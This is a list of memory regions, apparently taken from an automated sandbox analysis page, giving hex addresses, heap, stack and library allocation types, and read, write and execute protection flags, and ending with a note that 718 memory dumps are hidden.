stack
page read and write
5380000
heap
page execute and read and write
59AE000
stack
page read and write
1FFE475E000
heap
page read and write
24B8001B000
trusted library allocation
page read and write
DA0000
heap
page read and write
7FFB4AF80000
trusted library allocation
page read and write
1AB7B935000
heap
page read and write
5AFE000
trusted library allocation
page read and write
5390000
trusted library allocation
page execute and read and write
1090000
trusted library allocation
page read and write
7FFB4AED0000
trusted library allocation
page execute and read and write
1FFFE5B7000
heap
page execute and read and write
7FFB4B08B000
trusted library allocation
page read and write
2B06000
trusted library allocation
page read and write
24B80500000
trusted library allocation
page read and write
241345D0000
heap
page readonly
1AB7BB14000
heap
page read and write
1103000
heap
page read and write
24132B80000
heap
page read and write
7FFB4AD9C000
trusted library allocation
page execute and read and write
1AB79A50000
heap
page read and write
7FFB4A130000
trusted library allocation
page read and write
5E60000
heap
page read and write
24B80158000
trusted library allocation
page read and write
502E000
stack
page read and write
5C90000
heap
page read and write
24BFD740000
heap
page read and write
24134BE7000
trusted library allocation
page read and write
FB0000
heap
page read and write
1AB7B977000
heap
page read and write
1AB7BCBD000
heap
page read and write
13D7000
trusted library allocation
page execute and read and write
7FFB4A0D0000
trusted library allocation
page read and write
10FE000
heap
page read and write
1FFFEBE0000
heap
page read and write
2F2C000
trusted library allocation
page read and write
54C0000
heap
page read and write
13BB000
trusted library allocation
page read and write
D60000
heap
page read and write
1380000
trusted library allocation
page execute and read and write
24BFD610000
heap
page read and write
FF0000
heap
page read and write
1FFE45D0000
heap
page read and write
7FFB4AFD0000
trusted library allocation
page read and write
1AB7BA4D000
heap
page read and write
3010000
trusted library allocation
page read and write
7FFB4AFE0000
trusted library allocation
page read and write
241345A0000
trusted library allocation
page read and write
24BFD550000
heap
page read and write
13A4000
trusted library allocation
page read and write
7FFB4A1A0000
trusted library allocation
page read and write
7FFB4AEB0000
trusted library allocation
page execute and read and write
1AB7BCFB000
heap
page read and write
1FFE813A000
trusted library allocation
page read and write
7FFB49EB0000
trusted library allocation
page read and write
822000
unkown
page readonly
1AB7B927000
heap
page read and write
7FFB4ACF0000
trusted library allocation
page read and write
7FFB4A0E0000
trusted library allocation
page read and write
138F000
stack
page read and write
1AB7BA31000
heap
page read and write
61E68BC000
stack
page read and write
694E000
stack
page read and write
1AB7BCBE000
heap
page read and write
1FFE693C000
trusted library allocation
page read and write
FCD2F6000
stack
page read and write
F57000
stack
page read and write
7FFB4ACE4000
trusted library allocation
page read and write
1FFE46BD000
heap
page read and write
1AB7BA6D000
heap
page read and write
24BFD61B000
heap
page read and write
1AB7B92A000
heap
page read and write
299E000
stack
page read and write
24134F90000
trusted library allocation
page read and write
24BFB6CF000
heap
page read and write
7FFB49F5C000
trusted library allocation
page execute and read and write
1FFE8074000
trusted library allocation
page read and write
1AB7BCC0000
heap
page read and write
7FFB4AEC2000
trusted library allocation
page read and write
7FFB49EA3000
trusted library allocation
page execute and read and write
7FFB4A180000
trusted library allocation
page read and write
DA9000
heap
page read and write
24BFD597000
heap
page read and write
1AB79B4D000
heap
page read and write
1AB7B92A000
heap
page read and write
2DE0000
heap
page read and write
5752F7E000
stack
page read and write
5753FCE000
stack
page read and write
1AB7BA8D000
heap
page read and write
24134C42000
trusted library allocation
page read and write
24B80001000
trusted library allocation
page read and write
1AB7BA3D000
heap
page read and write
7FFB4A051000
trusted library allocation
page read and write
1AB7BA5D000
heap
page read and write
1FFE4669000
heap
page read and write
1AB7B99A000
heap
page read and write
7FFB4AEC2000
trusted library allocation
page read and write
7FFB49EAD000
trusted library allocation
page execute and read and write
24134BF1000
trusted library allocation
page read and write
D53000
trusted library allocation
page read and write
FC0000
heap
page read and write
7FFB4AF20000
trusted library allocation
page read and write
EE0000
heap
page read and write
EBE000
stack
page read and write
D9A000
heap
page read and write
13CA000
trusted library allocation
page execute and read and write
13AD000
trusted library allocation
page execute and read and write
1AB7BA48000
heap
page read and write
61E614E000
stack
page read and write
7FFB4AF40000
trusted library allocation
page read and write
1AB7BC06000
heap
page read and write
2CB1000
trusted library allocation
page read and write
7FFB4AD90000
trusted library allocation
page read and write
7FFB4ADA0000
trusted library allocation
page execute and read and write
69CE000
stack
page read and write
7FFB4ACFB000
trusted library allocation
page read and write
1FFE7D6B000
trusted library allocation
page read and write
1AB79A8F000
heap
page read and write
7FFB49EA4000
trusted library allocation
page read and write
7FFB4AF70000
trusted library allocation
page read and write
24134FB7000
trusted library allocation
page read and write
7FFB4AEF0000
trusted library allocation
page read and write
7FFB4AEA0000
trusted library allocation
page execute and read and write
11BE000
stack
page read and write
24B8088C000
trusted library allocation
page read and write
1AB7B99A000
heap
page read and write
1AB7B999000
heap
page read and write
4E4E000
stack
page read and write
1FFE64A1000
trusted library allocation
page read and write
1FFFE650000
heap
page read and write
5CD0000
heap
page read and write
7FFB4B061000
trusted library allocation
page read and write
1FFE681E000
trusted library allocation
page read and write
2B0B000
trusted library allocation
page read and write
24134AE0000
heap
page execute and read and write
1AB7B922000
heap
page read and write
1FFE6813000
trusted library allocation
page read and write
7FFB4A120000
trusted library allocation
page read and write
7FFB4AFF0000
trusted library allocation
page read and write
1AB7BB12000
heap
page read and write
5B0E000
trusted library allocation
page read and write
7FFB49FC0000
trusted library allocation
page execute and read and write
1FFE4748000
heap
page read and write
2414CE80000
heap
page read and write
7FFB4B050000
trusted library allocation
page read and write
241345C0000
trusted library allocation
page read and write
1AB7B972000
heap
page read and write
2414CC2E000
heap
page read and write
24BFB670000
heap
page read and write
1FFE46A7000
heap
page read and write
1FFFE7FC000
heap
page read and write
FCD9FE000
stack
page read and write
C9E000
stack
page read and write
2A9E000
stack
page read and write
1FFE7361000
trusted library allocation
page read and write
7FFB4A0C0000
trusted library allocation
page read and write
D4D000
trusted library allocation
page execute and read and write
7BB0583000
stack
page read and write
24BFB590000
heap
page read and write
7FFB4AEE0000
trusted library allocation
page read and write
154E000
stack
page read and write
61E6ABE000
stack
page read and write
1AB7BD01000
heap
page read and write
1FFF6451000
trusted library allocation
page read and write
10A3000
trusted library allocation
page read and write
24132C44000
heap
page read and write
2414CE97000
heap
page read and write
13C0000
heap
page read and write
1AB7BB13000
heap
page read and write
7FFB4AD96000
trusted library allocation
page read and write
58AD000
stack
page read and write
FCDCFB000
stack
page read and write
13B8000
trusted library allocation
page read and write
105E000
stack
page read and write
24132C72000
heap
page read and write
1FFE44F0000
heap
page read and write
1FFE6815000
trusted library allocation
page read and write
2414CC93000
heap
page read and write
10B0000
trusted library allocation
page read and write
10FE000
stack
page read and write
6749000
stack
page read and write
137E000
stack
page read and write
1AB7BDD9000
heap
page read and write
1AB7BC21000
heap
page read and write
7FFB4AF40000
trusted library allocation
page read and write
5752EFE000
stack
page read and write
7DF4C10E0000
trusted library allocation
page execute and read and write
1FFE5FC0000
trusted library allocation
page read and write
1FFE7B1A000
trusted library allocation
page read and write
1070000
trusted library allocation
page read and write
11B0000
heap
page read and write
24134BE2000
trusted library allocation
page read and write
13B0000
trusted library allocation
page read and write
7FFB49F60000
trusted library allocation
page execute and read and write
5DBC000
stack
page read and write
575404D000
stack
page read and write
10E8000
heap
page read and write
13DB000
trusted library allocation
page execute and read and write
586E000
stack
page read and write
241346C6000
heap
page read and write
24132C6E000
heap
page read and write
7FFB4A070000
trusted library allocation
page execute and read and write
10A9000
trusted library allocation
page read and write
5753277000
stack
page read and write
7FFB4AF00000
trusted library allocation
page read and write
3F59000
trusted library allocation
page read and write
1FFF6421000
trusted library allocation
page read and write
1FFF743B000
trusted library allocation
page read and write
2AE0000
heap
page read and write
7BB09FD000
stack
page read and write
7FFB49F50000
trusted library allocation
page read and write
24BFB6BB000
heap
page read and write
24BFB6B1000
heap
page read and write
24BFB6AE000
heap
page read and write
24132C20000
heap
page read and write
1FFE813E000
trusted library allocation
page read and write
9E8000
stack
page read and write
1AB7BB12000
heap
page read and write
1FFE5F50000
heap
page readonly
1FFE46E8000
heap
page read and write
1FFE7B14000
trusted library allocation
page read and write
61E64FD000
stack
page read and write
7FFB4A100000
trusted library allocation
page read and write
698E000
stack
page read and write
D50000
trusted library allocation
page read and write
1FFE6826000
trusted library allocation
page read and write
24134B74000
trusted library allocation
page read and write
7FFB4B063000
trusted library allocation
page read and write
13A3000
trusted library allocation
page execute and read and write
1AB7BB12000
heap
page read and write
1AB7B98B000
heap
page read and write
There are 718 hidden memdumps, click here to show them.